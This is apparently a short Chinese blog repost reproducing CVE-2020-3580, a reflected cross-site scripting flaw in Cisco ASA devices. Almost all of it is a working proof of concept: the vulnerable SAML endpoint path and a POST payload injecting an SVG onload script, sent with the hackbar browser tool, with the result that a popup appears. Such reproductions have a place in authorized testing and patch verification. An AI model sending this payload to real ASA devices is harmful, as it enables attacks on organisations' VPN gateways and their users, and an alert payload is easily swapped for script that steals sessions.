CISCO ASA设备的POST反射型XSS漏洞复现（CVE-2020-3580）

是这个界面的，就打开hackbar，注意url后面部分和post部分
URL部分
/+CSCOE+/saml/sp/acs?tgname=a
POST部分
SAMLResponse="><svg/onload=alert('XSSS')>

执行后就会弹窗

标签：3580,XSS,CISCO,hackbar,POST,CVE,部分,post
来源： https://www.cnblogs.com/jasy/p/16361407.html